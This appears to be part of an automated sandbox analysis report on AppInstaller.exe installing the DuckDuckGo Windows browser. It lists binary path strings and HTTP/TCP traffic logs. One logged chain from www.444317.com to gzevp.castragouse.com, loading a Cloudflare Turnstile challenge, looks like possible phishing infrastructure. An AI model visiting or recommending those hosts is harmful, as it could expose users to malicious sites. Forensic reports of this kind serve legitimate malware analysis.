Source: Binary string: WindowsBrowser/NetworkProtection.Grpc.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ^/WindowsBrowser/WindowsBrowser.Autocomplete.pdb/WindowsBrowser/WindowsBrowser.NetworkProtection.dlll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/COMMANDLINE.DLL/WindowsBrowser/CommandLine.dll/WINDOWSBROWSER/DUCKDUCKGO.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: h/WindowsBrowser/pt-BR/PresentationCore.resources.dllp/WindowsBrowser/zh-Hans/UIAutomationClient.resources.dlll/WindowsBrowser/zh-Hant/PresentationCore.resources.dlll/WindowsBrowser/pt-BR/UIAutomationClient.resources.dlln/WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdbp/WindowsBrowser/Microsoft.EntityFrameworkCore.Sqlite.dllp/WindowsBrowser/api-ms-win-core-errorhandling-l1-1-0.dlll/WindowsBrowser/zh-Hans/PresentationCore.resources.dll/WindowsBrowser/de/Microsoft.Win32.TaskScheduler.resources.dll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Z/WindowsBrowser/Microsoft.Windows.SDK.NET.dll`/WindowsBrowser/WindowsBrowser.SecureStorage.pdb`/WindowsBrowser/WebView2/v8_context_snapshot.binX/WindowsBrowser/WindowsBrowser.Bookmarks.pdbb/WindowsBrowser/Microsoft.Win32.TaskScheduler.dllb/WindowsBrowser/de/PresentationCore.resources.dllX/WindowsBrowser/Images/shadowTrackerDark.png`/WindowsBrowser/WebView2/vk_swiftshader_icd.json^/WindowsBrowser/WebView2/128.0.2739.79.manifest^/WindowsBrowser/System.Windows.Forms.Design.dll/WindowsBrowser/WindowsBrowser.SecureStorage.dllp source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbWindowsBrowser/WindowsBrowser.CrashHandler.pdbWindowsBrowser/WindowsBrowser.Common.pdbWindowsBrowser/WindowsBrowser.Common.Wpf.pdbWindowsBrowser/WindowsBrowser.Burning.pdbe.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.VPN.Tray.deps.json/WindowsBrowser/WindowsBrowser.Privacy.pdbon source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 2.pdb source: AppInstaller.exe, 00000008.00000002.3031199453.0000019EC92D8000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.SECURESTORAGE.PDBn.pdb/WindowsBrowser/WindowsBrowser.CrashReporting.pdbpng/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.PDBXML source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: X/WindowsBrowser/System.Diagnostics.Debug.dllb/WindowsBrowser/WindowsBrowser.CrashReporting.pdb/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dllX/WindowsBrowser/fr/System.Xaml.resources.dllb/WindowsBrowser/api-ms-win-crt-utility-l1-1-0.dll`/WindowsBrowser/System.ServiceModel.Security.dll^/WindowsBrowser/System.Threading.Overlapped.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dlld/WindowsBrowser/System.Globalization.Calendars.dllb/WindowsBrowser/WindowsBrowser.CrashReporting.dllX/WindowsBrowser/tr/System.Xaml.resources.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dllZ/WindowsBrowser/System.Net.NameResolution.dllX/WindowsBrowser/de/WindowsBase.resources.dllX/WindowsBrowser/Microsoft.AspNetCore.Mvc.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dlld/WindowsBrowser/cs/UIAutomationTypes.resources.dllb/WindowsBrowser/api-ms-win-core-handle-l1-1-0.dllX/WindowsBrowser/es/WindowsBase.resources.dlld/WindowsBrowser/api-ms-win-core-console-l1-2-0.dllb/WindowsBrowser/Microsoft.AspNetCore.Mvc.Cors.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dllf/WindowsBrowser/Microsoft.Web.WebView2.WinForms.dlld/WindowsBrowser/api-ms-win-core-console-l1-1-0.dllf/WindowsBrowser/System.Globalization.Extensions.dll`/WindowsBrowser/System.IO.Compression.Native.dll\/WindowsBrowser/Microsoft.Win32.Primitives.dllX/WindowsBrowser/Microsoft.Win32.Registry.dllX/WindowsBrowser/pl/WindowsBase.resources.dll\/WindowsBrowser/Microsoft.VisualBasic.Core.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dll/WindowsBrowser/WindowsBrowser.NetworkProtection.dllb source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.NETWORKPROTECTION.PDB/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdbPDB/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.XML/WindowsBrowser/WindowsBrowser.NetworkProtection.pdbON/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdbPDB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.CrashReporter.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbaml source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.UPDATER.DEPS.JSON/WINDOWSBROWSER/WINDOWSBROWSER.PRIVACY.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: http://www.example.com/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb source: AppInstaller.exe, 00000008.00000002.3031199453.0000019EC92D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.Wpf.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/Themes/Dark.xamlPNG/WindowsBrowser/Themes/Light.xamlPNG/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Bookmarks.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/MICROSOFT.ASPNETCORE.SIGNALR.PROTOCOLS.JSON.DLL/WINDOWSBROWSER/MICROSOFT.EXTENSIONS.FILEPROVIDERS.EMBEDDED.DLL/WindowsBrowser/Microsoft.Extensions.Identity.Stores.dllN.DLL/WINDOWSBROWSER/WEBVIEW2/SHOW_THIRD_PARTY_SOFTWARE_LICENSES.BAT/WINDOWSBROWSER/MICROSOFT.ASPNETCORE.MVC.DATAANNOTATIONS.DLL/WindowsBrowser/WebView2/show_third_party_software_licenses.bat/Images/Square44x44Logo.altform-unplated_targetsize-16.png.PNG/Images/Square44x44Logo.altform-lightunplated_targetsize-32.png/Images/Square44x44Logo.altform-lightunplated_targetsize-48.png/IMAGES/SQUARE44X44LOGO.ALTFORM-LIGHTUNPLATED_TARGETSIZE-16.PNG/Images/Square44x44Logo.targetsize-24_altform-unplated.pngpng/IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-256.PNG/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.SHARED.PDB source: AppInstaller.exe, 00000008.00000002.3034817725.0000019EC991D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /IMAGES/SQUARE44X44LOGO.TARGETSIZE-48.PNGe.sig/WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb/IMAGES/SQUARE44X44LOGO.TARGETSIZE-16.PNGl/WINDOWSBROWSER/WINDOWSBROWSER.STYLES.PDBLpdb/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.PDB2.pdb/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PDB/WindowsBrowser/WindowsBrowser.Bookmarks.pdbdb source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb.pdb/IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-16.PNGals/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.RUNTIMECONFIG.JSONdb source: AppInstaller.exe, 00000008.00000002.3034817725.0000019EC991D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WebView2/Components/CertificateRevocation/6498.2023.8.1/crl-sethttp://www.example.com/WindowsBrowser/WindowsBrowser.Sync.Crypto.Managed.dlllhttp://www.example.com/WindowsBrowser/WindowsBrowser.NetworkProtection.pdb.dll/WindowsBrowser/WebView2/copilot_provider_msix/copilot_provider_neutral.msixl source: AppInstaller.exe, 00000008.00000002.3034675400.0000019EC98F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.VPN.Tray.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Z/WindowsBrowser/WindowsBrowser.Common.Wpf.pdbd/WindowsBrowser/es/UIAutomationTypes.resources.dllb/WindowsBrowser/api-ms-win-core-fibers-l1-1-0.dllb/WindowsBrowser/zh-Hans/System.Xaml.resources.dlld/WindowsBrowser/Microsoft.AspNetCore.Mvc.Razor.dllb/WindowsBrowser/System.Diagnostics.StackTrace.dll/WindowsBrowser/WindowsBrowser.NetworkProtection.dll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AY.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___details/DuckDuckGo.appinstaller HTTP/1.1Accept-Encoding: gzip, deflateHost: staticcdn.duckduckgo.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzip, deflateRange: bytes=912523264-912614737Host: staticcdn.duckduckgo.com
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzip, deflateIf-Match: "5925754a576d519f9df83fc149834c65-109"Range: bytes=912392192-912523263If-Unmodified-Since: Tue, 24 Sep 2024 14:44:30 GMTHost: staticcdn.duckduckgo.com
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzip, deflateIf-Match: "5925754a576d519f9df83fc149834c65-109"Range: bytes=911736832-911867903If-Unmodified-Since: Tue, 24 Sep 2024 14:44:30 GMTHost: staticcdn.duckduckgo.com
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzip, deflateIf-Match: "5925754a576d519f9df83fc149834c65-109"Range: bytes=911867904-911998975If-Unmodified-Since: Tue, 24 Sep 2024 14:44:30 GMTHost: staticcdn.duckduckgo.com
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzip, deflateIf-Match: "5925754a576d519f9df83fc149834c65-109"Range: bytes=911998976-912130047If-Unmodified-Since: Tue, 24 Sep 2024 14:44:30 GMTHost: staticcdn.duckduckgo.com
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49755 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.444317.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fzFA/ HTTP/1.1Host: gzevp.castragouse.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.444317.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gzevp.castragouse.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gzevp.castragouse.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gzevp.castragouse.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gzevp.castragouse.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gzevp.castragouse.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cf2ed9a6c2641de&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
